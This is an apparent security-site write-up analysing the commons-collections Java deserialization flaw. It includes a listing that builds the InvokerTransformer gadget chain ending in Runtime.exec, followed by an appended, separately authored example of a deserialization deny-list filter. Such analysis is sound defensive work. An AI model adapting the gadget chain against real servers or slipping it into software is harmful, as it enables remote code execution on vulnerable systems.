Analysis of how the commons-collections Java deserialization vulnerability leads to RCE - Vulnerability Warning - MyHack58

ID MYHACK58:62201568893
Type myhack58
Reporter Anonymous
Modified 2015-11-12T00:00:00


0x01 The principle of the Java deserialization vulnerability

As with PHP unserialize vulnerabilities, Java deserialization vulnerabilities arise because user input controls the object that gets passed in. If the server-side program deserializes user-controlled serialized data directly, without validating it, and then runs some dangerous logic on the result (eval-like calls, login verification, and so on), unexpected vulnerabilities are triggered. This is not a new problem; earlier vulnerabilities caused by Java deserialization can be found in the referenced slides. This article instead looks at one particular environment in which deserialization achieves remote code execution (RCE). The exploit given in reference 3 was widely discussed in the community: using the jar file on GitHub to generate a serialized string and sending it to a vulnerable site is enough to trigger the bug. Exploitation, however, is not the focus of this article.

The problem starts with the Transformer classes in the commons-collections library, which are mainly used to transform the keys and values of a Map. Foreign researchers found that the transform method of the InvokerTransformer class invokes a method on the parameter object via reflection and returns the result of that call. Let's write some code to test it:

```java
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.InvokerTransformer;

@SuppressWarnings({"rawtypes", "unchecked"})
public class VulTest {
    public static void main(String[] args) {
        // Reflectively call append(String) with the argument "exploitcat?" on whatever object is passed to transform()
        Transformer transform = new InvokerTransformer(
                "append", new Class[]{String.class}, new Object[]{"exploitcat?"});
        Object newObject = transform.transform(new StringBuffer("your name is "));
        System.out.println(newObject);
    }
}
```

This creates an InvokerTransformer object and calls its transform method with a StringBuffer object as the parameter; after execution the output is the string:

your name is exploitcat?

So, through the reflection inside the transform method, we successfully called StringBuffer's append method and obtained its result, although with some twists and turns. This brings us one step closer to RCE. The next question is: who calls the transform method of these Transformer objects?

The transform methods are called by a class named TransformedMap, which wraps a native Map object through the TransformedMap.decorate method. Let's look inside this class:

(screenshot: the TransformedMap.decorate method)

The decorate method is the external entry point for creating a TransformedMap object. In the code we can clearly see where the transform method is invoked:

(screenshot: the transform call inside TransformedMap)

And when setValue is called on an entry, checkSetValue is executed:

(screenshot: the checkSetValue method)

To figure out what happens during setValue, let's look at the following code:

```java
import java.util.HashMap;
import java.util.Map;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.TransformedMap;

@SuppressWarnings({"rawtypes", "unchecked"})
public class TransformTest {
    public static void main(String[] args) {
        Transformer[] transformers = new Transformer[]{
                // 1. ignore the input and return the Runtime class object
                new ConstantTransformer(Runtime.class),
                // 2. Runtime.class.getMethod("getRuntime", new Class[0])
                new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class},
                        new Object[]{"getRuntime", new Class[0]}),
                // 3. getRuntimeMethod.invoke(null, new Object[0]) -> the Runtime instance
                new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class},
                        new Object[]{null, new Object[0]}),
                // 4. runtime.exec("calc")
                new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"})
        };
        Transformer chain = new ChainedTransformer(transformers);
        Map innerMap = new HashMap();
        innerMap.put("name", "hello");
        // wrap the map so that every value written through it is passed through the chain
        Map outerMap = TransformedMap.decorate(innerMap, null, chain);
    }
}
```
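As an added example (not code from the original article), the following Java program assumes commons-collections 3.1 on the classpath. It shows the step the page's own listing stops short of, namely that calling setValue on an entry of the decorated map runs the transformer chain (here a harmless chain that only upper-cases the value), and then a defensive ObjectInputStream that refuses to resolve the gadget classes before any instance is created, so such a map is rejected on deserialization. The class name DeserializationFilterDemo and the deny list are my own choices.

```java
import java.io.*;
import java.util.*;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.TransformedMap;

@SuppressWarnings({"rawtypes", "unchecked"})
public class DeserializationFilterDemo {
    // Gadget classes from the chain discussed above; legitimate input never needs them (assumed deny list).
    static final String[] DENIED_PREFIXES = {
        "org.apache.commons.collections.functors.", "org.apache.commons.collections.map.TransformedMap"};
    // Look-ahead check: refuse to resolve a denied class before any instance of it is created.
    static class FilteringObjectInputStream extends ObjectInputStream {
        FilteringObjectInputStream(InputStream in) throws IOException { super(in); }
        @Override
        protected Class<?> resolveClass(ObjectStreamClass desc) throws IOException, ClassNotFoundException {
            for (String p : DENIED_PREFIXES) {
                if (desc.getName().startsWith(p))
                    throw new InvalidClassException(desc.getName(), "blocked by deserialization filter");
            }
            return super.resolveClass(desc);
        }
    }
    static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) { oos.writeObject(o); }
        return bos.toByteArray();
    }
    static Object deserialize(byte[] bytes) throws IOException, ClassNotFoundException {
        try (ObjectInputStream ois = new FilteringObjectInputStream(new ByteArrayInputStream(bytes))) {
            return ois.readObject();
        }
    }
    public static void main(String[] args) throws Exception {
        // Harmless chain standing in for the Runtime.exec one: it only upper-cases strings.
        Transformer chain = new ChainedTransformer(new Transformer[]{
            new InvokerTransformer("toUpperCase", new Class[0], new Object[0])});
        Map inner = new HashMap(); inner.put("name", "hello");
        Map outer = TransformedMap.decorate(inner, null, chain);
        // setValue on an entry goes through checkSetValue, which runs the chain on the new value.
        Map.Entry entry = (Map.Entry) outer.entrySet().iterator().next();
        entry.setValue("world");
        System.out.println(inner.get("name"));                          // prints WORLD
        System.out.println(deserialize(serialize(new HashMap(inner))));  // a plain map is accepted
        try { deserialize(serialize(outer)); }                          // the decorated map is refused
        catch (InvalidClassException ex) { System.out.println("rejected: " + ex.getMessage()); }
    }
}
```

On Java 9 and later the same look-ahead check can be expressed with the JDK's built-in ObjectInputFilter (ObjectInputStream.setObjectInputFilter) instead of overriding resolveClass.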
